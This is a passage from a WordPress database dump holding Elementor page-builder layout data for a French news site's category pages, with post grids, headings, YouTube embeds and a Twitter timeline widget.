le\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"category\":[\"2\"],\"excerpt_value\":10,\"category_border_color\":\"#23a455\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2832,853,'_elementor_version','0.4'),(2834,854,'_elementor_data','[{\"id\":\"gmwrczs\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"5wcijtz\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"8qgudh6\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"category_border_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"q9jlzjp\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7ziad57\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(2835,854,'_elementor_version','0.4'),(2836,854,'_elementor_edit_mode','builder'),(2837,854,'_elementor_css','a:3:{s:4:\"time\";i:1508940392;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2839,855,'_elementor_data','[{\"id\":\"gmwrczs\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"5wcijtz\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"8qgudh6\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"category_border_color\":\"#4a00b4\",\"use_excerpt\":\"\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"q9jlzjp\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7ziad57\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(2840,855,'_elementor_version','0.4'),(2841,855,'_elementor_edit_mode','builder'),(2842,855,'_elementor_css','a:3:{s:4:\"time\";i:1509550471;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2844,856,'_elementor_data','[{\"id\":\"gmwrczs\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"5wcijtz\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"8qgudh6\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"category_border_color\":\"#4a00b4\",\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"use_excerpt\":\"\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"q9jlzjp\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7ziad57\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(2845,856,'_elementor_version','0.4'),(2846,856,'_elementor_edit_mode','builder'),(2847,856,'_elementor_css','a:3:{s:4:\"time\";i:1509550514;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2848,2,'_elementor_css','a:3:{s:4:\"time\";i:1509550574;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2849,857,'_elementor_edit_mode','builder'),(2850,857,'_elementor_data','[{\"id\":\"z4gm4k3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"nnu3fj2\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"nos8yf4\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"4\"],\"category_border_color\":\"#0099f4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"90b9fpd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"r2ttirp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Follow me on Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"900\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(2851,857,'_elementor_version','0.4'),(2852,857,'_elementor_css','a:3:{s:4:\"time\";i:1508940851;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2853,858,'_elementor_edit_mode','builder'),(2854,858,'_elementor_data','[{\"id\":\"z4gm4k3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"nnu3fj2\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"nos8yf4\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"4\"],\"category_border_color\":\"#0099f4\",\"button_bg_color\":\"#0099f4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"90b9fpd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"r2ttirp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Follow me on Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"900\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(2855,858,'_elementor_version','0.4'),(2857,859,'_elementor_edit_mode','builder'),(2858,859,'_elementor_data','[{\"id\":\"z4gm4k3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"nnu3fj2\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"nos8yf4\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"4\"],\"category_border_color\":\"#0099f4\",\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"use_excerpt\":\"\",\"button_bg_color\":\"#0099f4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"90b9fpd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"r2ttirp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Follow me on Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"900\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(2859,859,'_elementor_version','0.4'),(2860,859,'_elementor_css','a:3:{s:4:\"time\";i:1509550747;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2861,380,'_elementor_css','a:3:{s:4:\"time\";i:1509550767;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2862,860,'_elementor_edit_mode','builder'),(2863,860,'_elementor_data','[{\"id\":\"fvicxca\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"i3u6627\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"hofs521\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"8\"],\"category_border_color\":\"#432277\",\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"use_excerpt\":\"\",\"button_bg_color\":\"#432277\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"fd5brb2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"zugzy86\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Follow me on Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(2864,860,'_elementor_version','0.4'),(2865,860,'_elementor_css','a:3:{s:4:\"time\";i:1509019209;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2867,861,'_elementor_edit_mode','builder'),(2868,861,'_elementor_data','[{\"id\":\"ixiyn7h\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"22\"},\"elements\":[{\"id\":\"vzzha0l\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"rnv8c37\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"2\"],\"category_border_color\":\"#23a455\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"luwf0d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"lxbvyap\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[custom-facebook-feed]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2869,861,'_elementor_version','0.4'),(2870,861,'_elementor_css','a:3:{s:4:\"time\";i:1509498712;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2871,862,'_elementor_edit_mode','builder'),(2872,862,'_elementor_data','[{\"id\":\"ixiyn7h\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"22\"},\"elements\":[{\"id\":\"vzzha0l\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"rnv8c37\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"2\"],\"category_border_color\":\"#23a455\",\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"use_excerpt\":\"\",\"button_bg_color\":\"#23a455\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"luwf0d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"lxbvyap\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[custom-facebook-feed]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2873,862,'_elementor_version','0.4'),(2875,863,'_elementor_edit_mode','builder'),(2876,863,'_elementor_data','[{\"id\":\"fvicxca\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"i3u6627\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"hofs521\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"8\"],\"category_border_color\":\"#432277\",\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"use_excerpt\":\"\",\"button_bg_color\":\"#432277\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"fd5brb2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"wpbhkym\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(2877,863,'_elementor_version','0.4'),(2878,863,'_elementor_css','a:3:{s:4:\"time\";i:1509550870;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2879,864,'_elementor_edit_mode','builder'),(2880,864,'_elementor_data','[{\"id\":\"ixiyn7h\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"22\"},\"elements\":[{\"id\":\"vzzha0l\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"rnv8c37\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"2\"],\"category_border_color\":\"#23a455\",\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"use_excerpt\":\"\",\"button_bg_color\":\"#23a455\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"luwf0d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"48vhr8l\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Follow me on Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(2881,864,'_elementor_version','0.4'),(2882,864,'_elementor_css','a:3:{s:4:\"time\";i:1509551007;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2883,378,'_elementor_css','a:3:{s:4:\"time\";i:1509551141;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2884,865,'_elementor_edit_mode','builder'),(2885,865,'_elementor_data','[{\"id\":\"4q8fxni\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"norfumb\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"akbi56c\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"5\"],\"category_border_color\":\"#23a455\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"b0tgp49\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8hnfvt3\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(2886,865,'_elementor_version','0.4'),(2887,865,'_elementor_css','a:3:{s:4:\"time\";i:1508941456;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2888,866,'_elementor_edit_mode','builder'),(2889,866,'_elementor_data','[{\"id\":\"4q8fxni\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"norfumb\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"akbi56c\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"5\"],\"category_b